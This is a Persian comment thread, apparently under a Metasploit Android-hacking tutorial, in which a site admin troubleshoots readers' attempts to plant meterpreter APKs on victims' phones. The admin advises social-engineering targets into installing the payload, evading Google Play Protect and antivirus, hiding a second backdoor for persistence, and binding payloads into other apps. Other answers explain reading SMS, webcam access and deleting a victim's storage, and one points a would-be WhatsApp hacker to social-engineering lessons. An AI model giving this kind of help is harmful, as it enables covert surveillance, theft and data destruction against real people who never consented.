سلام ببخشید من کل اینا رو تست کردم فقط یه مشکلی دارم اونم اینه که وقتی فایل apk رو میسازم و روی گوشی خودم نصب میکنم اکسپلوت رو اجرا میکنم کار نمیکنه .فقط در صورتی کار میکنه که لپتاپی که مودم اینترنت بهش وصله گوشی هم به همون مودم وصل باشه یعنی اگه از اینترنت ایرانسل استفاده کنم اصلا کار نمیکنه
ممنون میشم راهنمایی کنید
درود
آموزش پورت فورواردینگ را مشاهده کنید یا می توانید از سرور مجازی برای حل این مشکل استفاده کنید.
با سلام و خسته نباشید !!
من می تونم ار بعضی از دوستورات استافده کنم
ولی مثلا دستور
رکورد کردن صدای قربانی این رور رو میده
Meterpreter session 8 closed. Reason: Died
و بعد تازه هر چند دقیقه یک session رو میبنده و یکی دیگه باز میکنه
می خواستم بدونم دلیلش چیه
درود بر شما
دسترسی قطع شده است باید برسی کنید، در صورتی که برنامه مجوز دسترسی به میکروفون را نداشته باشد این مورد ممکن است به وجود اید.
سلام. من هنگامی که میزنم ifconfig آی پی اصلی رو نمیده اینو میده
۱۲۷.۰.۰.۱
چیکار کنم؟
درود
حتما باید به شبکه متصل باشید و از برقراری اتصال خود مطمئن شوید ، در صورتی که از سرور مجازی استفاده می کنید می توانید از ای پی سرور استفاده کنید.
سلام چجوری میتونم راتو به عکس تزریق کنم وبا عکس نفوذ کنم؟
درود
سوال شما بسیار کلی است ، برای این کار باید اسیب پذیری خاصی در سیستم عامل پیدا کنید که از این روش بتوانید نفوذ کنید برای مثال اموزش اسیب پذیری واتساپ را مشاهده کنید.
سلام چگونه بعد از متصل شدن به قربانی دسترسی کامل بگیریم و دسترسی ما بسته نشود
درود
برای مثال می توانید یک بکدور دیگر با نام دیگر به صورت مخفی در دستگاه موبایل نصب کنید تا در صورت حذف شدن برنامه اصلی دسترسی شما قطع نشود.
برای من WARNING: No database support: No database YAML file این ارور رو میده باید چیکار کنم
درود
معمولا این ارور باعث ایجاد اختلالی نمی شود که نتوانید از ابزار استفاده کنید
اما برای حل ان از طریق ترمینال دستور msconsole را نزنید و از منو کالی لینوکس ایکن متاسپلویت را انتخاب کنید و حتما متاسپلویت خود را اپدیت کنید.
با سلام بعد از دسترسی گرفتن از اندروید که روت هم نیست ولی بلافاصله بعد از چند ثانیه دسترسی خارج میشه برای دسترسی داشتن طولانی آموزشی دارین ممنون میشم قرار بدین
درود
باید مشکل را پیدا کنید از همین روش می توانید دسترسی به صورت طولانی مدت داشته باشید که البته داخل دوره اموزش کالی لینوکس به موارد مختلفی هم در این رابطه پرداخته شد.
ابزار ها و رات های دیگری هم در پن تست کور معرفی شده است که می توانید با کمی جستجو انها را پیدا و استفاده کنید.
من یه سوالی داشتم … میخواستم بدونم که بعد اینکه من همه کارارو کردم میخواستم به ویندوز انتقال بدم که بعد بدمش به گوشیم ….. ترمینال رو بستم … الان چجوری میتونم همونو باز کنم ؟ از جایی که منتظر نصب طرف باشیم تا بعد از نصب کار دلخواهمونو بکنیم؟….
درود
مجدد متاسپلویت را باز کنید و پیلود خود را ست کنید و تنظیمات قبل که مربوط به پورت و ای پی شما بوده است را مجدد انجام دهید.
به این صورت می توانید از اپ نصب شده از قبل استفاده کنید.
سلام من برای این کار از سرور مجازی سایت avalserver استفاده میکنم وقتی ای پی و پورت سرور مجازی را میزنم و فایل apk ساخته میشه از کجا فایل را پیدا کنم یعنی کجای سیستم کالی ذخیره می شود ؟؟
چون قبل از اینکه از سرور مجازی استفاده کنم apk در قسمت home سیستم عامل ذخیره میشد اما الان نه
ممنون میشم راهنماییم کنید .
درود
مسیر فایل ساخته شده به سرور مجازی مربوط نیست فایل در بخش home ذخیره می شود دقت کنید که با چه یوزری وارد شده اید و مسیر همان یوزر را برسی کنید.
همچنین در هنگام ایجاد فایل در بخشی که نام فایل را انتخاب می کنید می توانید مسیر ذخیره فایل را هم مشخص کنید.
با سلام و خسته نباشید.
یه سوال داشتم:از کجا بفهمیم در LPORT چه عددی رو وارد کرد.با تشکر
درود و تشکر
پورت های شبکه از ۱ تا ۶۵۵۳۵ هستند که می توانید از بین این پورت ها ، یک پورت را برای این موضوع اختصاص دهید
دقت داشته باشید برای جلوگیری از ایجاد مشکل از پورت های باز و پیشفرض استفاده نکنید که برای اشنایی با ان ها باید کمی با مفاهیم شبکه اشنا باشید.
سلام خسته نباشید
میخواستم بدونم راهی وجود داره بدون دسترسی فیزیکی یک فایل apk رو روی سیستم هدف نصب کرد؟
درود و تشکر
با روش های مهندسی اجتماعی باید فایل را طوری به تارگت ارسال کنید که ان را نصب کند و بعد از گرفتن دسترسی می توانید مجدد بودن دسترسی فیزیکی برنامه های دیگری نصب کنید.
من وقتی میخوام apk رو generate کنم اخطار میده میگه
pauload generation failed: The argument could not be parsed correctly
چیکار کنم ؟
درود
یک بار کلا متاسپلویت را اپدیت کنید و مجدد تست کنید ببنید مشکگل حل می شود یا خیر.
در صورتی که باز هم مشکل داشتید دستوری که وارد کرده اید را دقیقا ارسال کنید.
سلام چرا برنامه ساخته شده درگوشی قربانی نصب میشه ولی در متاسپلویت هیچ تغیری نمیکنه ولی تو گوشی خودم نصب میکنم تو متاسپلویت اجرا میشه ولی قربانی نصب میکنه هیچی اتفاقی نمی افته
درود
احتمالا شما فقط تنظیمات شبکه داخلی را انجام داده اید برای استفاده از این روش در شبکه اینترنت باید از سرور مجازی استفاده کنید یا درون سیستم خود پورت فورواردینگ انجام دهید که اموزش ان داخل سایت قرار دارد.
سلام واسه من تا اخرش اوکیه اما اپ روی موبایل تصب نمیشه
مشکل از چی میتونه باشه؟
ورژن های خاصی از اندروید نیازه که بشه پیلود رو روش نصب کرد یا روی هر ورژنی نصب میشه ؟(ورژنم ۴.۱.۲)
یا کار دیگه ای میشه انجام داد؟
درود
احتمالا به دلیل سپر امنیتی گوگل است می توانید برای دور زدن ان از اینجا اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.
سلام آقا نیما من حتی پورت فوروارینگ انجام میدم ولی نمیدنم چرا کار نمیکنه دلیلش چی ؟ تو متاسپلویت
درود
دلیل اصلی که می تواند داشته باشد و بسیاری با ان مشکل دارند پورت فورواردینگ است طبق اموزش پورت فورواردینگ داخل سایت انجام دهید و پورت خود را با استفاده از سایت انلاین معرفی شده چک کنید.
پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید تا نیازی به پورت فورواردینگ نداشته باشید.
سلام چطوری میشه وقتی نفوذ کردیم کل یک فولدر رو دانلود کرد ؟ چون تو اموزش فقط گفته بودید دونه دونه میشه فایل های یک فولدر رو دانلود کرد ، من میخوام کل یک فولدر رو دانلود کنم
ممنون میشم کمکم کنید
درود
می توانید با دسترسی کامند لاین یک فولدر را فشرده کنید و فایل فشرده را منتقل کنید.
سلام انجام دادم ولی کار نکرد نمیدونم چرا با پورت ۴۴۴۴ و ۴۴۳ دلیلش چیه؟
درود
اگر از شبکه داخلی استفاده می کنید احتمالا ای پی صحیح وارد نکرده اید ، اگر هم داخل شبکه اینترنت اینکار را انجام می دهید احتمالا مراحل پروت فورواردینگ را به درستی انجام نداده اید.
پیشنهاد می کنیم داخل سرور مجازی اینکار را انجام دهید.
سلام ممنون میشم اینم راهنمایی کنید
Could not install packages due to an EnvironmentError: [Errno 13] Permission denied: ‘/usr/local/lib/python3.6/site-packages/soupsieve-2.0.dist-info’
Consider using the `–user` option or check the permissions.
You are using pip version 10.0.1, however version 20.0.2 is available.
You should consider upgrading via the ‘pip install –upgrade pip’ command.
درود
از نسخه قدیمی pip استفاده می کنید با دستور زیر ان را اپدیت کنید :
pip install –upgrade pip
سلام
برای مخفی شدن میشه TORمعرفی کرد به متاسپلویت یا فقط با سرور مجازی میشه مخفی شد
اگه TOR Lمیشه اینکارو کرد توضیح بدید ممنون
درود
خیر از تور نمی توانید برای اینکار استفاده کنید.
سلام
ببخشید من تمام کار هایی رو که گفتید مو به مو انجام دادم
روی شبیه ساز اندروید مثل بلواستکس جواب میده
ولی رو گوشی های حقیقی خیر و زمانی که رو برنامه ها کلیک میکنم هیچ اتفاقی نمی افته
در ضمن من از شبکه ی wifi خانگی استفاده میکنم
درود
از اتصال دستگاه موبایل به شبکه داخلیتون مطمئن شوید ، می توانید پورت فورواردینگ انجام دهید یا از سرور مجازی استفاده کنید و مجدد تست کنید.
روی برنامه کلیک می کنید هیچ اتفاقی نباید بیفتد اما باید اتصال شما با دستگاه بر قرار شود.
سلام خسته نباشید
امکانش هست که فایل مخرب رو در اسکریپت یه برنامه دیگه قرار بدیم ؟ یعنی با نصب کردن یه برنامه عادی فایل مخرب هم همراه با کدهای اون برنامه وارد سیستم بشه
درود
بله امکانش هست برای مثال داخل اموزش نفوذ به اندروید این روش اموزش داده شده است اما در متاسپلویت کمی متفاوت است که در اموزش های بعدی با این روش کار خواهیم کرد.
با سلام
من نته گوشیم رو هات اسپات می کنم ایا لازمه که پورت فورواردینگ رو انجام بدم ؟
درود
خیر ، طبق اموزش پورت فورواردینگ قرار داده شده می توانید از روش ngrok استفاده کنید.
سلام خسته نباشید
ببخشید که انقدر سورال می کنم :))
می خواستم بدونم من که با hotspot گوشی به اینترنت وصل میشم بعد از یکبار خاموش کردن سیستم ip عوض میشه و دسترسی رو از دست میدم ؟
دوم اینکه با همین ویروس میشه موقعیت مکانی هم بدست آورد یا نه ؟
درود بر شما تشکر
بله ، در این صورت دسترسی از بین خواهد رفت.
با این روش می توانید از طریق ای پی محدوده کلی کلاینت را بدست اورید.
سلام من سوالی داشتم خدمتتون
من اگر سرور بخرم(مهم نیست سرورم چی باشه؟ویندوز یا هر نوع لینوکسی؟؟؟
سیستمم کالیه
وقتی توی ترمینال اطلاعات رو وارد کنم کلا ایبی و بورت سرورم رو بزنم ؟همون واسه ست هم واسه هندلیر؟؟بعد از ساخت برنامه طرف نصب کنه
من دیگه از توی ترمینال خود لینوکسم(روی سیستمم)میبینم؟؟؟یا باید توی سرور باشم و سرورم حتما باید کالی باشه؟
درود
سرور شما باید لینوکس باشد ،
بله از ای پی سرور و پورت مورد نظر خود استفاده کنید.
و از طریق اتصال به سرور می توانید کلاینت های خودتونو مدیریت کنید.
سلام خسته نباشید مرسی از اموزش های خوبتون من برای دسترسی به گوشی برای خارج از شبکه با ngrok هاست مجازی میسازم و با درستور msfvenom پیش میرم ک خارج از شبکه کنترل داشته باشم میخواستم بدونم راهی هست ک تو دستور ام اس اف ونوم برنامه رو هاید کرد یا خیر و اینکه برای قربانی پیغام اسیب به دستگاه از طرف گوگل نیاد
درود و تشکر از شما
پیشنهاد می کنیم طبق اموزش داده شده پیش بروید، برای حل این مشکلتون می توانید اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.
سلام
اگر بخواهم با متااسپلویت و از طریق اینترنت پابلیک از یک گوشی دسترسی بگیرم باید پورت فورواردینگ انجام بدم ؟
ممنون
درود
اگر از سیستم شخصی استفاده می کنید بله؛ اما اگر از سرور مجازی استفاده می کنید خیر.
سلام خدمت شما
تشکر از سایت بسار خوبتون
من exploit رو که می زنم این رو نمایش می ده:
Started reverse TCP handler on 192.168.50.136:6060
میشه راهنمایی کنید لطفا…
network هم روی NAT قرار دارد.
ip رو درست وارد کردم.مطمئن هستم.
لپ تاپ و موبایل هم به یک مودم جیبی متصل هستند.هر دو به یک مودم…
میشه راهنمایی کنید ممنون می شم…
درود بر شما، تشکر
کاملا طبیعی است متاسپلویت منتظر برقراری ارتباط است.
برنامه اندروید را بعد از نصب اجرا کنید اتصال بر قرار می شود.
من متاسپلویت روی گوشیم نصب کردم و الان میخام فایل apk درست کردم پیدا کنم پیدا نمیکنم لطفا کمکم کنید
درود
احتمالا در همان مسیری که هستید فایل باید ساخته شده باشد اما شما می توانید در هنگامی که در خواست ساخت apk می کنید قبل از وارد کردن نام، ادرس دایرکتوری دلخواه خود را وارد کنید.
سلام برای هک حتما باید لپ تاپ و گوشی طرف مقابل به یک وای وای وصل شده باشن
درود
خیر ، شما اگر ای پی شبکه داخلی خود را وارد کنید بله اما اگر از سرور مجازی استفاده کنید یا پورت فورواردینگ انجام دهید خیر.
سلام
میخواستم بدونم که فقط گوشی ها ی اندرویدی را می شود هک کرد مثلا تبلت های اندرویدی را می شود هک کرد یا میشود اندروید پوشیدنی که بر روی ساعت ها نصب می شود یا اندروید تی وی را هم هک کرد؟
درود
در هر دستگاه اندرویدی که بتوانید فایل apk نصب کنید می توانید از ان دسترسی بگیرید.
سلام در قسمت ای پی که باید بدیم ب متاسپلویت ای پی گوشی یا اینترنت خودمونو وارد کنیم؟ اگ سرور مجازی باید استفاده کنیم اموزشش استفادش رو لینک بزارید ممنون میشم.
درود
برای استفاده از طریق سیستم خودتون اموزش پورت فورواردینگ را مشاهده کنید ، در استفاده از سرور مجازی فقط ای پی پابلیک سرور مجازی را وارد کنید هیچ اموزش دیگری نیاز ندارد.
با سلام من فایل apk رو به تارگت دادم و دسترسی ام ایجاد شده میخواستم بدونم دستوری هست که حافظه داخلی رو پاک کنه
از طریق دستورات وارد حافظه داخلی شوید و اطلاعات مورد نظرتونو با دستور rm -f پاک کنید.
با سلام میخواستم بدونم بعد از نصب apk توسط کاربر چگونه گوشی را ریست فکتوری کنیم ایا دستوری هست که در ترمینال بزنیم
درود
می توانید از طریق دستورات پوشه های اصلی و مهم را حذف کنید که پوشه های مهم ممکن است در حالت روت فقط قابل حذف باشند.
سلام من exploit میزنم این میاد Handler failed to bind to وExploit failed: Errno::EACCES Permission denied – bind(2) for
چکنم؟
درود
اجازه دسترسی ندارد از بخش apps دسترسی های برنامه را برسی کنید.
و اگر برنامه امنیتی خاصی دارید موقتا ان را برای تست غیر فعال کنید.
سلام و درود مهندس خسته نباشید بنده چند سوال از شما دارم اونم اینکه از اونجایی که متاسپلویت ابزاری عمومی هست به سادگی گوگل پلی و سایر انتی ویروس ها اونو تشخیص میدن و باید برای حل این با استفاده از برنامه نویسی جاوا و صرف وقت نسبتا زیادی برنامه رو به طوری ویرایش کنیم که تارگت و انتی ویروس نفهمه اما همون جور که گفتم وقت زیادی میگیره و یکی دیگه از قابلیت های متاسپلویت دسترسی گرافیکی به برنامه های تارگته یعنی با استفاده از دستور اپ راین و نام پکیج برنامه که اسم پکیج برنامه با دستور اپ لیست بدست میاد میشه به برنامه های تارگت دسترسی داشت و جوری به نظر میرسه که انگار تلفن تارگت دست خود شخص نفوذ گره و من خیلی این قابلیت برام مهمه و گفتم به شما بگم که ایا رات یا پیلودی رو میتونید به بنده معرفی کنید که با برنامه ای دیگه ترکیب بشه و دسترسی گرافیکی به برنامه های تارگت بده ایا چنین رات رو شما میشناسید اگه میشناسید لطفا معرفی کنید با تشکر اقای حسینی موفق باشید
درود بر شما تشکر
برای حل مشکل انتی ویروس اموزش دور زدن سپر امنیتی گوگل را مشاهده کنید.
برای دسترسی گرافیکی از اندروید خیلی کار منطقی نیست بخواهید انجام دهید اما برای بایند کردن می توایند از رات هایی مانند اسپای نوت استفاده کنید یا از ابزار های بایندری که وجود دارند.
سلام خسته نباشید من با port forwarding و no ip مشکل دارم خوب من سیستم بیسم خودم کالی هست زیاد حرفه ای نیستم اما در حال یاد گیریش هستم و الان که یک سرور ابونتو دارم که مال یکی از دوستام هست خوب با port 22 و ip … که نمیگم اینجا خوب من دقیقا نمیدونم چرا کار نمیکنه برام وقتی ip و port رو معرفی میکنم اونجا میگه ست شد اما وقتیexploit میزنم میگه مشکل دارید در وصل شدن به ip و یکم خوندم این مطالب بالا رو خوب یه جا گفته بوید که از ip پابلیک استفاده کنید و این که منم معنی شو میدونم اما نمیدونم دقیقا کدوم میشه ip پابلیک واینکه من با نت گوشیم hotspot کردم به به laptopm اما نمیدونم چی کار کنم میشه یکم راهنماییم کنید و ایا حتما بیاد برم سرور کالی لینوکس بخرم برای انجامش ؟ واین که بخرم و یه سوال دیگه وقتی من راتم موفق ساخته شد خوب میخوام بایندش کنم توی عکس که یه اموزش دیدم که چگونه بایند کنم توی عکس راتو خوب اما قبلش یه بار تست میکنم روی گوشی خودم ببینم که اصلا سالم هست رات و دسترسی میده و این سوال اصلی اینه وقتی رات نصب شه روی تارگت اگر من از ترمینالم خارج نشده باشم بزنم exploit نشون میده که دسترسی دارم ایا و این که من میخوام صفحه گوشیشتو ببینم خوب مشکلم اینکه دقیق نمیدونم چه دستوری لازمه میشه یکم راهنمایی کنید ؟
درود و تشکر
داخل سرورتون از پورت ۲۲ استفاده نکنید احتمالا از طریق ssh متصل شده اید و پورت ۲۲ برای سرویس ssh است و اشغال است پورت دیگری را انتخاب کنید.
ای پی پابلیک سرور شما همان ای پی است که از طریق ان متصل شده اید.
نوع اتصال اینترنت شما به سرور ربطی ندارد.
در صورتی که از ترمینال هم خارج شوید می توانید مجدد هم متصل شوید.
ابزار هایی که در خصوص بایند با عکس هستند اکثرا فیک هستند و برای الوده کردن سیستم شما هستند و توصیه نمی کنیم استفاده کنید.
برای استفاده از دسترسی هایی که دارید از دستوراتی که گفته شده است استفاده کنید.
سلام ممنون از اموزش خوبتون…
من یک مشکل دارم اونم اینه که وقتی دسترسی meterpreter میگیرم ولی وقتی وبکم استریم رو میزنم ارور میده میگه باید جاوا اسکریپت رو روی مرورگر فعال کنی درحالی که جاوا اسکریپت روی مرورگر اکسپلورر من فعاله لطفا کمک کنید
درود بر شما تشکر
از مرورگر های دیگر مانند کروم استفاده کنید ، دقت داشته باشید دسترسی به دوربین در دستگاه کلاینت به برنامه داده شده باشد. اگر باز هم مشکلی داشتید متن ارور را ارسال کنید.
برای تنظیم پورت می توانیم پورت ۸۰۸۰ انتخاب کنیم؟
درباره آیپی و پورت میشه بیشتر توضیح بدید؟
درود
بله می توانید از پورت ۸۰۸۰ هم استفاده کنید.
برای اشنایی با پورت و ای پی اموزش های شبکه را در پن تست کور جستجو و مشاهده کنید.
پورت های شبکه از ۱-۶۵۵۳۵ هستند.
اما باید با ای پی های استاتیک و داینامیک حتما اشنا شوید و جستجو انجام دهید چرا که این موضوع گسترده است.
سلام میشه دستورات بعد از گرفتن دسترسی در متاسپلویت برای ریختن فایل به گوشی یا ریختن فایل های گوشی به داخل کامپیوتر رو هم یاد بدید یا مثلا پیامکاشو چطوری باید بخونیم یا چطوری دسترسی به دوربینش داشته باشیم
درود
مواردی که فرمودید اموزش داده شده کل متن اموزش را مطالعه کنید.
سلام نرم افزار عالیه من ازش استفاده کردم مخصوصا پیامکش
۵ ستاره هم کمه
درود
خوشحالیم که این آموزش برای شما کاربردی بوده
موفق و پیروز باشید.
درود .خسته نباشید. من به گوشی طرف مقابل دسترسی ندارم و اینکه نمیتونم واسش برنامه بفرستم اگه بفرستم مطمئنم اجراش نمیکنه.راه دیگه ای سراغ ندارین .من فقط واتساپش رو میخام هک کنم. ممنون میشم جواب بدین
درود
پیشنهاد می کنم آموزش مربوط با روشهای مهندسی اجتماعی را مشاهده کنید که در حل مشکل شما کمک خواهد کرد.
سلام وقتتون بخیر ببخشید یه سوال داشتم
من همه مراحل به خوبی اجرا میکنم اما وقتی تارگت پیلود نصب میکنه متاسپلویت دسترسی مترپتر بهم نمیده و فقط سیشن باز میکنه با دسترسی خیلی خیلی محدود. همیشه هم این مشکل پیش نمیاد (بگیر نگیر داره) علتش چیه و چه طور این مشکل حل کنم ممنون
درود
در نسخه های جدید اندروید شما بعد از نصب برنامه در دستگاه باید به تک تک به بخشهای مختلف دسترسی بدهید؛ اگر دسترسی ها محدود شده باشد با این مشکل مواجه می شوید و باید حتماً دسترسی های لازمه را به برنامه بدهید تا دسترسی کامل داشته باشید.
سلام و عرض ادب . من قبلا با این متد کار میکردم اما به یک صورت دیگه . میخواستم بدونم ایا این متد یا ترفند شما !
اندروید بالای ورژن ۱۰ را پشتیبانی میکنه ؟
چون متد من فقط برای ورژن اندروید زیر ۱۰ یعنی ۹ و ۸ . ۶ و…
در اندروید ۱۰ هنگامی که فایل خروجی و بر روی گوشی نصب میکنیم . یک پیامی میده
که این برنامه قدیمی میباشد و به طراح و خلق کننده این برنامه پیام بدهید .
میشه لطفاً راهنمایی کنید !
چون این ارور رفع نشه به شما هیچ اجازه دسترسی به ترموکس را نخواهد داد
درود
بر روی اندروید ۱۰ هم این روش جواب می دهد اما باز هم برای اطمینان این مورد را تست خواهیم کرد و اگر مشکلی وجود داشت و روش جدیدتری آموزش خواهیم داد.
سلام مجدد اون پیامی که گفتم در اندروید ۱۰ ذکر شده اینه !
This App Was Bilt for and Older Version of Android and May Not Work Properly . Try Checking For Updates or Contact the Developer.
اگه این خطا در ایندروید ۱۰ رفع نشه امکان دسترسی وجود نداره!
میشه راهنمایی کنید!
چون من با Msfvenom -p Android/MeterPreter … اندروید ۹ و ۸ و ۶ وراحت می شد هک کرد اما اندروید نسخه ۱۰ نمیشه!
درود
فکر نمیکنم که این مشکل روی همه دستگاه ها باشد اما حتماً بررسی میکنیم اگر روی همه دستگاههای مشکل وجود داشت آموزش جدید در این رابطه قرار خواهیم داد.
درود با تشکر از سایت خوبتون
من تمامی مراحل انجام دادم و از سرور مجازی هم استفاده میکنم بعد از exploit این ارور رو میده :
handler failed to bind to ***..***.***.***:6666
مشکل از کجاست ؟
درود بر شما
این مشکل ممکن است دلایل مختلفی داشته باشد و یکی از این دلایل استفاده از برنامههای امنیتی در اندروید باشد که توانسته باشد تشخیص دهند یک برنامه کانکشن نا امن برقرار کرده و دسترسی شما قطع میشود یا خود برنامه دسترسی محدودی دارد که این مشکل پیش آمده است.
سلام اقا نیما چرا اکثر اموزشایی که دیدم از دستور msfvenom استفاده میکنن ولی شما اینکارو نکردید چه تفاوتی داره؟؟
درود
دستورات تفاوتی ندارند اما ما از روش جدیدتر استفاده میکنیم و این روش مفهومی تر هم هست و می توانید با درک بهتری از روش آموزش داده شده استفاده کنید.
سلام مهندس یه سوال؟
Metasploit روی اندروید چند جواب میده؟
اخه موقعی که سیشن گرفته میشه METERPRETER SESSION 1 CLOSED REASON=DIED
مشکل از چی روشی هست فیکسش کنم؟
بعد دسترسی هم که من میگیرم محدوده مثلا کلا دسترسی shell نمیگیرم.
ممنون میشم یه راهنمایی بنده رو بکنید.
درود
متاسپلویت پیلود های مختلفی دارد که هر کدام روی نسخه های مختلفی هم کار می کنند.
روش اتصال را تغیر بدین برای مثال اگر از NOIP استفاده می کنید از NGROK استفاده نمایید یا اتصال مستقیم بزنید.
یکبار هم از شبکه داخلی تست کنید.
مشکل بعدیتون هم حتمالا دسترسی محدود داشتن اپلیکیشن در دستگاه شماست.
سلام ، کسایی که ویندوز کار میکنن تکلیفشون چی میشه؟ چطوری هک کنن؟
درود
می توانید از نسخه ویندوزی متاسپلویت استفاده کنید یا کالی را در ماشین مجازی در کنار ویندوز داشته باشید.
سلام و خسته نباشید خدمت شما
تشکر میکنم بابت آموزش خوبتون
ببخشید من وقتی میخوام به خارج از شبکه دسترسی بگیرم، یه وقتهایی روی برنامه که میزنم راحت سشن برام باز میشه، ولی اکثر مواقع حداقل باید دو سه بار روی برنامه بزنم تا دسترسی بگیرم، اون سشنهایی هم که برام باز میشه دسترسی فول نمیده، رو شبکه لوکال خیلی راحت جواب میده روی ورژن ۸.۱ اندروید خیلی خوب جواب داده، ولی وقتی خارج از شبکه اینکارو میکنم حتی رو ورژن ۶ هم تست کردم دسترسیهام همین مشکلی هست که عرض کردم، درضمن با ابزار ngrok من پورت فوراردینگ انجام میدم، میخوام ببینم مشکل از پورت فورواردینگه؟؟؟ یا پیلود مشکل داره؟
درود بر شما و تشکر از دیدگاه خوب شما
برای حل این مشکل اینکار را داخل سرور مجازی انجام بدین یا از سرویس های دیگری جز ngrok استفاده کنید.
ببخشید میشه آموزش کامل کالی لینوکس
برای کسایی که هیچی از هک نمیدونن بزارید
درود
دوره اموزش کالی لینوکس موجود است که اموزش کامل در ان قرار دارد.
پیشنیاز هم ندارد می توانید از این دذوره استفاده کنید.
ممنون از اموزش فقط دو تا سوال داشتم من بلد نیستم کالی به نت وصل کنم مشکلی ندارع سوال بعد از ای پی بدی میتونن پیدات کنن
درود
بستگی دارد از کالی لینوکس در مجازی ساز استفاده می کنید یا نصب کرده اید اگر از مجازی ساز استفاده میکنید از داخل تنظیمات network مجازی ساز باید اتصال اینترنت را برقرار کنید که به صورت اتوماتیک اصولا وصل می شود زمانی که سیستم اصلی شما به اینترنت دسترسی دارد. سوال دوم شما هم بله.
سلام ببخشید فایل بکدور که گفتین انتهای اموزش هست کجاست میشه بگین از کجا تهیه کنم
درود مرسی از اطلاع شما لینک را در آموزش قرار خواهیم داد.
سلام
برای بخش ای پی پورت باید سرور خریده باشم و ای پی پورت اونو بزنم؟
درود
بله می توانید از سرور استفاده کنید یا از سرویس هایی مانند ngrok استفاده کنید که داخل سایت اموزش ان موجود است و می توانید از بخش جستجو ان را سرچ و مشاهده کنید.
درود و خسته نباسید
ببخشید برای سرور مجازی از کجا سرور بخرم که سیستم عامل لینوکس داشته باشه برای حملات وارز باشد ؟؟
با تشکر
درود بر شما تشکر
شما می توانید به وب سایت اول سرور از لینک زیر مراجعه کنید:
avalserver.com
با سلام دوباره
بنده سرور لینوکسی خریداری کردم ولی وقتی ip و port را می زنم وصل نمی شه و برنامه ساخته نمی شه . می شه کمکم کنید ؟؟
درود
آموزش را کامل مشاهده کنید و باید از دستور generate برای ساخت فایل استفاده کنید و در صورتی که باز هم مشکل داشتید باید اروری که دریافت می کنید را ارسال کنید تا ما بتوانیم به شما کمک کنیم.
سلام دستور meterpeter رو میزنم ارور میده و ساخته نمیشه
درود
اروری که دریافت میکنید را ارسال کنید.
با سلام و خسته نباشید
ببخشید بنده الان سرور خریداری کردم و آدرس آیپی و پورت سرور رو می زنم ولی نمی دونم چرا ارور می ده و متصل نمی شه ؟؟
درود و تشکر
چه اروری دریافت می کنید متن ارور را ارسال کنید.
با سلام
Exploit compiled but no session was created
و اینکه بنده آیپی و پورت را دقیق وارد کردم
درود
بعد از ست کردن پیلود مجدد LHOST و LPORT تنظیم کنید.
چرا وقتی exploit رو میزنم اینو unknown command:exploit. میگه؟
درود
احتمالا وارد multi/handler و پیلود مورد نظر نشدید که این مشکل را دارید طبق اموزش به ترتیب پیش بروید.
سلام و درود مرسی از اموزش خوبتان
فقط وقتی که من PAYLOAD رو میزنم میگه is not valid میشه راهنمایی کنید؟
درود بر شما خواهش میکنم
این ارور به دلیل اشتباه نوشته شدن دستور است که باید دقت کنید دستور مورد نظر را به درستی و کامل وارد کردهاید و حروف کوچک و بزرگ را رعایت کنید.
سلام میشه از این پیلود در خارج شبکه هم استفاده کنیم ؟؟ باید چکار کنیم خارج از شبکه هم جواب بده ؟؟
درود
باید از سرور مجازی استفاده کنید یا اموزش پورت فورواردینگ را مشاهده کنید، همچنین می توانید دوره اموزش کالی لینوکس را هم مشاهده نمایید.
سلام ببخشید مشکلی نداره داخل سرور مجازی ویندوز وی ام ور یا مجازی ساز نصب کنیم و کالی را داخل مجازی ساز نصب کنیم و تست نفوذ انجام بدیم
ایا مشکلی پیش میاد ؟
درود
داخل سرور مجازی به دلیل اینکه خود سرور به صورت مجازی سازی شده است نمی توانید مجازی ساز نصب کنید.
سلام خسته نباشید من metasploit رو روی ویندوز نصب کردم و اجراش کردم و دارم مراحل رو پیش میرم سوال اینجاست که این اشتباهه و باید روی کالی نصب کنم ؟ و برای ایپی و پورت سرور مجازی از کجا خریداری کنم ؟ و چجوری از سرور مجازی استفاده کنم ؟
درود
روی ویندوز مشکلی ندارد، برای تهیه سرور مجازی به وب سایت اول سرور مراجعه کنیدو بعد از تهیه در قسمت LHOST ایپی سرور مجازی را وارد کنید.
سلام خسته نباشید من هرچی میگردم فایلو تو سیستمم پیدا نمیکنم که رو موبایل نصب کنم شاید بخاطر این ارور هست Error while running command generate: Permission denied – Mahan.apk
درود و تشکر
با یوزر روت انجام بدین یا مسیر فایل خروجی را به دستکاپ خود بدهید.
سلام من بعد از زدن exploit یه تیکه خط کد میاد و دیگه اون تیکه کد ادامه داده نمیشه
درود
شما تا متنی که دریافت می کنید را ارسال نکنید نمی توانیم شما را راهنمایی کنیم.
سلام استاد
من برای ساخت فایل ip و port که در no ip ساختم میزنم و پورتی که در پورت فورواردینگ زدم میزنم
وارد سایتی که در آموزش no ip گفتید چک میکنم اتصال هست .ولی ایپی رو ک ست میکنم run ک میزنم برنامه رو اجرا میکنم اتصال بر قرار نمیشه .با ngrok امتحان کردم شد ولی بدیش اینه ک هر سری ۱ ایپی میده و باید یک بار دیگه فایل ساخت ارسال کرد
no ip رو چطور درست کنم
ممنون از سایت خوبتون
درود
احتمالا مشکل در پورت فورواردینگ دارید تنظیمات ان را بررسی کنید.
پیشنهاد می کنیم داخل سرور مجازی استفاده کنید که این مشکلات را نداشته باشید.